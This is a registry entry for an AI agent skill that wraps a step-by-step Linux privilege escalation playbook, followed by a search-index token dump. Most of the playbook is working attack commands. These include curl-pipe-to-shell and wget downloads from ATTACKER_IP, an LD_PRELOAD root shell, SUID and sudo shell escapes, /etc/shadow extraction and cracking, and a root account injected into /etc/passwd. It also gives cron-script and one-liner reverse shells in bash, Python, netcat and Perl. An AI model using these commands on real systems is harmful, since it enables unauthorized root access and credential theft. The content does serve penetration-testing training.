{"id":"125c13fc-32e0-4d6f-a7c6-75382dadd539","shortId":"g6GqSF","kind":"skill","title":"linux-privilege-escalation","tagline":"Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n<!-- security-allowlist: curl-pipe-bash -->\n\n# Linux Privilege Escalation\n\n## Purpose\n\nExecute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.\n\n## Inputs / Prerequisites\n\n### Required Access\n- Low-privilege shell access to target Linux system\n- Ability to execute commands (interactive or semi-interactive shell)\n- Network access for reverse shell connections (if needed)\n- Attacker machine for payload hosting and receiving shells\n\n### Technical Requirements\n- Understanding of Linux filesystem permissions and ownership\n- Familiarity with common Linux utilities and scripting\n- Knowledge of kernel versions and associated vulnerabilities\n- Basic understanding of compilation (gcc) for custom exploits\n\n### Recommended Tools\n- LinPEAS, LinEnum, or Linux Smart Enumeration scripts\n- Linux Exploit Suggester (LES)\n- GTFOBins reference for binary exploitation\n- John the Ripper or Hashcat for password cracking\n- Netcat or similar for reverse shells\n\n## Outputs / Deliverables\n\n### Primary Outputs\n- Root shell access on target system\n- Privilege escalation path documentation\n- System enumeration findings report\n- Recommendations for remediation\n\n### Evidence Artifacts\n- Screenshots of successful privilege escalation\n- Command output logs demonstrating root access\n- Identified vulnerability details\n- Exploited configuration files\n\n## Core Workflow\n\n### Phase 1: System Enumeration\n\n#### Basic System Information\nGather fundamental system details for vulnerability research:\n\n```bash\n# Hostname and system role\nhostname\n\n# Kernel version and architecture\nuname -a\n\n# Detailed kernel information\ncat /proc/version\n\n# Operating system details\ncat /etc/issue\ncat /etc/*-release\n\n# Architecture\narch\n```\n\n#### User and Permission Enumeration\n\n```bash\n# Current user context\nwhoami\nid\n\n# Users with login shells\ncat /etc/passwd | grep -v nologin | grep -v false\n\n# Users with home directories\ncat /etc/passwd | grep home\n\n# Group memberships\ngroups\n\n# Other logged-in users\nw\nwho\n```\n\n#### Network Information\n\n```bash\n# Network interfaces\nifconfig\nip addr\n\n# Routing table\nip route\n\n# Active connections\nnetstat -antup\nss -tulpn\n\n# Listening services\nnetstat -l\n```\n\n#### Process and Service Enumeration\n\n```bash\n# All running processes\nps aux\nps -ef\n\n# Process tree view\nps axjf\n\n# Services running as root\nps aux | grep root\n```\n\n#### Environment Variables\n\n```bash\n# Full environment\nenv\n\n# PATH variable (for hijacking)\necho $PATH\n```\n\n### Phase 2: Automated Enumeration\n\nDeploy automated scripts for comprehensive enumeration:\n\n```bash\n# LinPEAS\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# LinEnum\n./LinEnum.sh -t\n\n# Linux Smart Enumeration\n./lse.sh -l 1\n\n# Linux Exploit Suggester\n./les.sh\n```\n\nTransfer scripts to target system:\n\n```bash\n# On attacker machine\npython3 -m http.server 8000\n\n# On target machine\nwget http://ATTACKER_IP:8000/linpeas.sh\nchmod +x linpeas.sh\n./linpeas.sh\n```\n\n### Phase 3: Kernel Exploits\n\n#### Identify Kernel Version\n\n```bash\nuname -r\ncat /proc/version\n```\n\n#### Search for Exploits\n\n```bash\n# Use Linux Exploit Suggester\n./linux-exploit-suggester.sh\n\n# Manual search on exploit-db\nsearchsploit linux kernel [version]\n```\n\n#### Common Kernel Exploits\n\n| Kernel Version | Exploit | CVE |\n|---------------|---------|-----|\n| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |\n| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |\n| 5.8+ | Dirty Pipe | CVE-2022-0847 |\n\n#### Compile and Execute\n\n```bash\n# Transfer exploit source\nwget http://ATTACKER_IP/exploit.c\n\n# Compile on target\ngcc exploit.c -o exploit\n\n# Execute\n./exploit\n```\n\n### Phase 4: Sudo Exploitation\n\n#### Enumerate Sudo Privileges\n\n```bash\nsudo -l\n```\n\n#### GTFOBins Sudo Exploitation\nReference https://gtfobins.github.io for exploitation commands:\n\n```bash\n# Example: vim with sudo\nsudo vim -c ':!/bin/bash'\n\n# Example: find with sudo\nsudo find . -exec /bin/sh \\; -quit\n\n# Example: awk with sudo\nsudo awk 'BEGIN {system(\"/bin/bash\")}'\n\n# Example: python with sudo\nsudo python -c 'import os; os.system(\"/bin/bash\")'\n\n# Example: less with sudo\nsudo less /etc/passwd\n!/bin/bash\n```\n\n#### LD_PRELOAD Exploitation\nWhen env_keep includes LD_PRELOAD:\n\n```c\n// shell.c\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\n\nvoid _init() {\n    unsetenv(\"LD_PRELOAD\");\n    setgid(0);\n    setuid(0);\n    system(\"/bin/bash\");\n}\n```\n\n```bash\n# Compile shared library\ngcc -fPIC -shared -o shell.so shell.c -nostartfiles\n\n# Execute with sudo\nsudo LD_PRELOAD=/tmp/shell.so find\n```\n\n### Phase 5: SUID Binary Exploitation\n\n#### Find SUID Binaries\n\n```bash\nfind / -type f -perm -04000 -ls 2>/dev/null\nfind / -perm -u=s -type f 2>/dev/null\n```\n\n#### Exploit SUID Binaries\nReference GTFOBins for SUID exploitation:\n\n```bash\n# Example: base64 for file reading\nLFILE=/etc/shadow\nbase64 \"$LFILE\" | base64 -d\n\n# Example: cp for file writing\ncp /bin/bash /tmp/bash\nchmod +s /tmp/bash\n/tmp/bash -p\n\n# Example: find with SUID\nfind . -exec /bin/sh -p \\; -quit\n```\n\n#### Password Cracking via SUID\n\n```bash\n# Read shadow file (if base64 has SUID)\nbase64 /etc/shadow | base64 -d > shadow.txt\nbase64 /etc/passwd | base64 -d > passwd.txt\n\n# On attacker machine\nunshadow passwd.txt shadow.txt > hashes.txt\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n```\n\n#### Add User to passwd (if nano/vim has SUID)\n\n```bash\n# Generate password hash\nopenssl passwd -1 -salt new newpassword\n\n# Add to /etc/passwd (using SUID editor)\nnewuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash\n```\n\n### Phase 6: Capabilities Exploitation\n\n#### Enumerate Capabilities\n\n```bash\ngetcap -r / 2>/dev/null\n```\n\n#### Exploit Capabilities\n\n```bash\n# Example: python with cap_setuid\n/usr/bin/python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n\n# Example: vim with cap_setuid\n./vim -c ':py3 import os; os.setuid(0); os.execl(\"/bin/bash\", \"bash\", \"-c\", \"reset; exec bash\")'\n\n# Example: perl with cap_setuid\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/bash\";'\n```\n\n### Phase 7: Cron Job Exploitation\n\n#### Enumerate Cron Jobs\n\n```bash\n# System crontab\ncat /etc/crontab\n\n# User crontabs\nls -la /var/spool/cron/crontabs/\n\n# Cron directories\nls -la /etc/cron.*\n\n# Systemd timers\nsystemctl list-timers\n```\n\n#### Exploit Writable Cron Scripts\n\n```bash\n# Identify writable cron script from /etc/crontab\nls -la /opt/backup.sh        # Check permissions\necho 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh\n\n# If cron references non-existent script in writable PATH\necho -e '#!/bin/bash\\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh\nchmod +x /home/user/antivirus.sh\n```\n\n### Phase 8: PATH Hijacking\n\n```bash\n# Find SUID binary calling external command\nstrings /usr/local/bin/suid-binary\n# Shows: system(\"service apache2 start\")\n\n# Hijack by creating malicious binary in writable PATH\nexport PATH=/tmp:$PATH\necho -e '#!/bin/bash\\n/bin/bash -p' > /tmp/service\nchmod +x /tmp/service\n/usr/local/bin/suid-binary      # Execute SUID binary\n```\n\n### Phase 9: NFS Exploitation\n\n```bash\n# On target - look for no_root_squash option\ncat /etc/exports\n\n# On attacker - mount share and create SUID binary\nshowmount -e TARGET_IP\nmount -o rw TARGET_IP:/share /tmp/nfs\n\n# Create and compile SUID shell\necho 'int main(){setuid(0);setgid(0);system(\"/bin/bash\");return 0;}' > /tmp/nfs/shell.c\ngcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell\n\n# On target - execute\n/share/shell\n```\n\n## Quick Reference\n\n### Enumeration Commands Summary\n| Purpose | Command |\n|---------|---------|\n| Kernel version | `uname -a` |\n| Current user | `id` |\n| Sudo rights | `sudo -l` |\n| SUID files | `find / -perm -u=s -type f 2>/dev/null` |\n| Capabilities | `getcap -r / 2>/dev/null` |\n| Cron jobs | `cat /etc/crontab` |\n| Writable dirs | `find / -writable -type d 2>/dev/null` |\n| NFS exports | `cat /etc/exports` |\n\n### Reverse Shell One-Liners\n```bash\n# Bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\n\n# Python\npython -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'\n\n# Netcat\nnc -e /bin/bash ATTACKER_IP 4444\n\n# Perl\nperl -e 'use Socket;$i=\"ATTACKER_IP\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");'\n```\n\n### Key Resources\n- GTFOBins: https://gtfobins.github.io\n- LinPEAS: https://github.com/carlospolop/PEASS-ng\n- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester\n\n## Constraints and Guardrails\n\n### Operational Boundaries\n- Verify kernel exploits in test environment before production use\n- Failed kernel exploits may crash the system\n- Document all changes made during privilege escalation\n- Maintain access persistence only as authorized\n\n### Technical Limitations\n- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)\n- AppArmor/SELinux may restrict exploitation techniques\n- Container environments limit kernel-level exploits\n- Hardened systems may have restricted sudo configurations\n\n### Legal and Ethical Requirements\n- Written authorization required before testing\n- Stay within defined scope boundaries\n- Report critical findings immediately\n- Do not access data beyond scope requirements\n\n## Examples\n\n### Example 1: Sudo to Root via find\n\n**Scenario**: User has sudo rights for find command\n\n```bash\n$ sudo -l\nUser user may run the following commands:\n    (root) NOPASSWD: /usr/bin/find\n\n$ sudo find . -exec /bin/bash \\; -quit\n# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Example 2: SUID base64 for Shadow Access\n\n**Scenario**: base64 binary has SUID bit set\n\n```bash\n$ find / -perm -u=s -type f 2>/dev/null | grep base64\n/usr/bin/base64\n\n$ base64 /etc/shadow | base64 -d\nroot:$6$xyz...:18000:0:99999:7:::\n\n# Crack offline with john\n$ john --wordlist=rockyou.txt shadow.txt\n```\n\n### Example 3: Cron Job Script Hijacking\n\n**Scenario**: Root cron job executes writable script\n\n```bash\n$ cat /etc/crontab\n* * * * * root /opt/scripts/backup.sh\n\n$ ls -la /opt/scripts/backup.sh\n-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh\n\n$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh\n\n# Wait 1 minute\n$ /tmp/bash -p\n# id\nuid=1000(user) gid=1000(user) euid=0(root)\n```\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |\n| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |\n| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |\n| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["linux","privilege","escalation","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-linux-privilege-escalation","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/linux-privilege-escalation","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34726 github stars · SKILL.md body (11,492 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-23T12:51:10.423Z","embedding":null,"createdAt":"2026-04-18T21:40:01.259Z","updatedAt":"2026-04-23T12:51:10.423Z","lastSeenAt":"2026-04-23T12:51:10.423Z","tsv":"'-04000':654 '-0847':512 '-1':755 '-16995':506 '-2016':496 '-2017':505 '-2022':511 '-5195':497 '/bin/bash':558,576,587,595,621,692,773,800,814,835,900,942,1000,1099,1104,1144,1281,1367 '/bin/sh':566,705 '/carlospolop/peass-ng':1153 '/carlospolop/peass-ng/releases/latest/download/linpeas.sh':412 '/dev/null':657,665,784,1042,1047,1059,1315 '/dev/tcp/attacker_ip/4444':884,903,1073 '/etc':293 '/etc/cron':858 '/etc/crontab':848,875,1051,1353 '/etc/exports':967,1063 '/etc/issue':291 '/etc/passwd':312,324,594,726,761 '/etc/shadow':681,721,1320 '/exploit':531 '/home/user/antivirus.sh':906,909 '/les.sh':426 '/linenum.sh':415 '/linpeas.sh':450 '/linux-exploit-suggester.sh':471 '/lse.sh':420 '/mzet-/linux-exploit-suggester':1159 '/opt/backup.sh':878,887 '/opt/scripts/backup.sh':1355,1358,1364,1372 '/proc/version':286,462 '/root':772 '/share':985 '/share/shell':1014 '/tmp':938 '/tmp/bash':693,696,697,1368,1371,1376 '/tmp/nfs':986 '/tmp/nfs/shell':1007,1010 '/tmp/nfs/shell.c':1003,1005 '/tmp/service':945,948 '/tmp/shell.so':639 '/usr/bin/base64':1318 '/usr/bin/find':1277 '/usr/bin/python3':793 '/usr/local/bin/suid-binary':922,949 '/usr/share/wordlists/rockyou.txt':739 '/var/spool/cron/crontabs':853 '/vim':806 '0':617,619,769,770,798,812,833,885,904,996,998,1002,1074,1091,1285,1288,1291,1327,1386 '1':257,422,766,886,905,1075,1094,1251,1360,1374 '1000':1380,1383 '18000':1326 '2':397,656,664,783,1041,1046,1058,1097,1294,1314 '2.6':489 '3':452,491,1339 '4':533 '4.13':500 '4.4':498 '443/80':1416 '4444':1088,1107,1117 '5':642 '5.8':507 '50':1363 '6':775,1324 '7':837,1329 '8':911 '8000':439 '8000/linpeas.sh':446 '9':954 '99999':1328 'abil':125 'access':31,84,115,120,136,220,247,1189,1244,1299 'action':1466 'activ':349 'add':741,759 'addr':344 'allow':24,77 'antup':352 'apache2':926 'apparmor/selinux':1205,1432 'applic':1460 'arch':296,1404 'architectur':279,295 'artifact':236 'aslr':1202 'assess':9,47,62 'associ':172 'aton':1132 'attack':143,434,444,521,731,969,1086,1105,1114,1401 'author':37,45,1193,1229 'autom':398,401 'aux':368,381 'awk':569,573 'axjf':375 'base64':676,682,684,717,720,722,725,727,1296,1301,1317,1319,1321 'bash':270,301,339,363,386,406,432,458,466,516,539,550,622,649,674,712,749,780,787,815,819,844,869,882,914,957,1069,1070,1071,1265,1307,1351 'basic':174,260 'begin':574 'beyond':1246 'binari':103,198,644,648,668,917,932,952,975,1302,1424,1434 'bit':1305 'boundari':1164,1237 'c':557,583,605,794,807,816,1078 'call':918 'cap':791,804,823 'capabl':106,776,779,786,1043 'cat':285,290,292,311,323,461,847,966,1050,1062,1352 'chang':1183 'check':879,1394,1412,1420,1431,1447 'chmod':447,694,907,946,1008,1369 'command':128,242,549,920,1018,1021,1264,1274 'common':162,482 'compil':177,513,523,623,989,1392,1399 'comprehens':93,404 'configur':252,1223 'connect':140,350,1126,1411 'constraint':1160 'contain':1210 'context':304 'control':36,51,89 'core':254 'cow':494 'cp':687,691,1366 'crack':207,709,1330 'crash':1178 'creat':930,973,987 'critic':1239 'cron':104,838,842,854,867,872,889,1048,1340,1346,1437,1442,1445 'crontab':846,850,1453 'curl':408 'current':302,1026 'custom':180 'cve':488,495,504,510 'd':685,723,728,1057,1322 'data':1245 'db':477 'defens':48 'defin':1235 'deliver':215 'demonstr':245 'deploy':400 'describ':1467 'detail':250,266,282,289 'dir':1053 'directori':322,855 'dirti':493,508 'document':227,1181 'doubl':502 'drop':1435 'e':826,899,941,977,1103,1110 'echo':394,881,898,940,992,1365 'editor':764 'educ':52 'ef':370 'egress':1421 'elev':25,78 'enabl':92 'enumer':94,189,229,259,300,362,399,405,419,536,778,841,1017 'env':389,600 'environ':53,384,388,1170,1211 'escal':4,8,56,61,225,241,1187 'ethic':1226 'euid':1385 'evid':235 'exampl':551,559,568,577,588,675,686,699,788,801,820,1249,1250,1293,1338 'exec':565,704,818,834,1143,1280 'execut':5,58,127,515,530,633,950,1013,1348,1440,1462 'exist':893 'exploit':16,69,96,181,192,199,251,424,454,465,469,476,484,487,518,529,535,544,548,598,645,666,673,777,785,840,865,956,1155,1167,1176,1200,1208,1216,1391,1426 'exploit-db':475 'exploit.c':527 'export':936,1061 'extern':919 'f':652,663,1040,1313 'fail':1174,1393 'fals':318 'familiar':160 'fetch':503 'file':253,678,689,715,1034 'filesystem':156 'filter':1422 'find':230,560,564,640,646,650,658,700,703,915,1035,1054,1240,1256,1263,1279,1308 'firewal':1413 'follow':1273 'fpic':627 'full':387 'fundament':264 'gather':263 'gcc':178,526,626,1004,1396,1398,1406 'generat':750 'getcap':781,1044 'getprotobynam':1124 'gid':1287,1382 'github.com':411,1152,1158 'github.com/carlospolop/peass-ng':1151 'github.com/carlospolop/peass-ng/releases/latest/download/linpeas.sh':410 'github.com/mzet-/linux-exploit-suggester':1157 'grep':313,316,325,382,1316 'group':327,329,1290 'gtfobin':195,542,670,1148,1430 'gtfobins.github.io':546,1149 'guardrail':1162 'harden':1217 'hash':752 'hashcat':204 'hashes.txt':736,740 'hijack':108,393,913,928,1343 'home':321,326 'host':147 'hostnam':271,275 'http.server':438 'id':306,1028,1283,1378 'identifi':14,67,248,455,870 'ifconfig':342 'immedi':1241 'import':584,795,809,1079 'includ':602,607,608,610 'inet':1121,1131 'inform':262,284,338 'init':612 'input':112 'int':993 'interact':129,133 'interfac':341 'ip':343,347,445,979,984,1087,1106,1115 'ip/exploit.c':522 'issu':1389 'job':105,839,843,1049,1341,1347,1438 'john':200,737,1333,1334 'keep':601 'kernel':98,169,276,283,453,456,480,483,485,1022,1166,1175,1197,1214 'kernel-level':1213 'key':1146 'knowledg':167 'l':358,409,421,541,1032,1267 'la':852,857,877,1357 'ld':596,603,614,637 'legal':1224 'les':194 'less':589,593 'level':35,88,1215 'lfile':680,683 'librari':625 'limit':1195,1212 'linenum':185,414 'liner':1068 'linpea':184,407,1150 'linpeas.sh':449 'linux':2,11,54,64,123,155,163,187,191,417,423,468,479,1154 'linux-privilege-escal':1 'list':863 'list-tim':862 'listen':355 'log':244,332 'logged-in':331 'login':309 'look':960 'low':28,81,117 'low-privileg':27,80,116 'ls':655,851,856,876,1356 'm':437 'machin':144,435,442,732 'made':1184 'main':994 'maintain':1188 'malici':931 'manual':472 'match':1429 'may':1177,1198,1206,1219,1270 'membership':328 'minut':1375 'misconfigur':17,70,101 'mitig':1201 'modern':1196 'mount':970,980 'n/bin/bash':943 'nano/vim':746 'nbash':901 'nc':1102 'need':142 'netcat':208,1101 'netstat':351,357 'network':135,337,340 'new':757,767 'newpassword':758 'newus':765 'nfs':110,955,1060 'nologin':315 'non':892 'non-exist':891 'nopasswd':1276 'nostartfil':632 'o':528,629,981,1006 'offlin':1331 'one':1067 'one-lin':1066 'open':1134,1137,1140 'openssl':753 'oper':287,1163 'option':965 'os':585,796,810,1082 'os.dup2':1089,1092,1095 'os.execl':813 'os.setuid':797,811 'os.system':586,799 'output':214,217,243 'overview':1470 'ownership':159 'p':698,706,944,1116,1130,1377 'p7ptkeku1hnahprtznizs1':768 'passwd':744,754 'passwd.txt':729,734 'password':206,708,751 'path':107,226,390,395,897,912,935,937,939,1451 'payload':146,1419 'perl':821,825,1108,1109 'perm':653,659,1036,1309 'permiss':157,299,880,1449 'persist':1190 'pf':1120 'phase':256,396,451,532,641,774,836,910,953 'pipe':509 'port':1415 'posix':828,831 'preload':597,604,615,638 'prerequisit':113 'primari':216 'privileg':3,7,29,55,60,82,118,224,240,538,1186,1436 'process':359,366,371 'product':1172 'ps':367,369,374,380 'purpos':57,1020 'py3':808 'python':578,582,789,1076,1077 'python3':436 'quick':1015 'quit':567,707,1282 'qw':829 'r':460,782,1045 'read':679,713 'receiv':149 'recommend':182,232 'refer':196,545,669,890,1016 'releas':294 'remedi':234 'report':231,1238 'requir':114,152,1227,1230,1248 'research':269 'reset':817 'resourc':1147 'restrict':1207,1221 'return':1001 'revers':138,212,1064,1408 'right':1030,1261 'ripper':202 'rockyou.txt':1336 'role':274 'root':34,87,218,246,379,383,771,963,1254,1275,1286,1289,1292,1323,1345,1354,1361,1362,1387 'root-level':33,86 'rout':345,348 'run':365,377,1271,1443 'rw':982 'rwxrwxrwx':1359 's.connect':1085 's.fileno':1090,1093,1096 'salt':756 'scenario':1257,1300,1344 'scope':1236,1247 'screenshot':237 'script':166,190,402,428,868,873,894,1342,1350 'search':463,473 'searchsploit':478 'secur':21,46,74 'semi':132 'semi-interact':131 'servic':19,72,356,361,376,925,1444 'set':1306 'setgid':616,997 'setuid':618,792,805,824,830,832,995 'sh':413 'shadow':714,1298 'shadow.txt':724,735,1337 'share':624,628,971 'shell':119,134,139,150,213,219,310,991,1065,1409 'shell.c':606,631 'shell.so':630 'show':923 'showmount':976 'similar':210 'skill':42,91,1458 'skill-linux-privilege-escalation' 'smap':1204 'smart':188,418 'smep':1203 'sock':1122 'sockaddr':1128 'socket':1080,1112,1118 'socket.socket':1084 'solut':1390 'sourc':519 'source-sickn33' 'squash':964 'ss':353 'stage':1418 'start':927 'static':1407 'status':1446 'stay':1233 'stderr':1141 'stdin':1135 'stdout':1138 'stream':1123 'string':921 'subprocess':1081 'subprocess.call':1098 'success':239 'sudo':100,534,537,540,543,554,555,562,563,571,572,580,581,591,592,635,636,1029,1031,1222,1252,1260,1266,1278 'suggest':193,425,470,1156 'suid':102,643,647,667,672,702,711,719,748,763,916,951,974,990,1033,1295,1304,1423 'summari':1019 'sys/types.h':609 'system':12,65,124,223,228,258,261,265,273,288,431,575,620,845,924,999,1180,1218 'systemat':6,59 'systemctl':861 'systemd':859 'tabl':346 'target':122,222,430,441,525,959,978,983,1012 'tcp':1125 'technic':151,1194 'techniqu':1209 'test':1169,1232 'timer':860,864 'tool':183 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'transfer':427,517 'tree':372 'tri':1414 'troubleshoot':1388 'tulpn':354 'type':651,662,1039,1056,1312 'u':660,1037,1310 'uid':1284,1379 'unam':280,459,1024 'understand':153,175 'unsetenv':613 'unshadow':733 'use':38,40,467,762,827,1111,1173,1405,1417,1456 'user':30,83,297,303,307,319,334,742,849,1027,1258,1268,1269,1381,1384 'util':164 'v':314,317 'valid':49 'variabl':385,391 'verifi':1165,1427,1441,1450 'version':170,277,457,481,486,1023,1428 'via':710,1255 'view':373 'vim':552,556,802 'void':611 'vulner':18,71,99,173,249,268 'w':335 'wait':1373 'weak':22,75,111 'wget':443,520 'whoami':305 'within':1234 'wordlist':738,1335 'workflow':255,1464 'writabl':866,871,896,934,1052,1055,1349 'write':690 'written':1228 'x':448,490,492,499,501,908,947,1448 'xyz':1325","prices":[{"id":"3bd83fcc-5591-4a1a-bdf2-33439ba6b8ad","listingId":"125c13fc-32e0-4d6f-a7c6-75382dadd539","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:40:01.259Z"}],"sources":[{"listingId":"125c13fc-32e0-4d6f-a7c6-75382dadd539","source":"github","sourceId":"sickn33/antigravity-awesome-skills/linux-privilege-escalation","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation","isPrimary":false,"firstSeenAt":"2026-04-18T21:40:01.259Z","lastSeenAt":"2026-04-23T12:51:10.423Z"}],"details":{"listingId":"125c13fc-32e0-4d6f-a7c6-75382dadd539","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"linux-privilege-escalation","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34726,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-23T06:41:03Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"c3d2d08b92f192b1b63bb0600599f40c480bb542","skill_md_path":"skills/linux-privilege-escalation/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"linux-privilege-escalation","description":"Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/linux-privilege-escalation"},"updatedAt":"2026-04-23T12:51:10.423Z"}}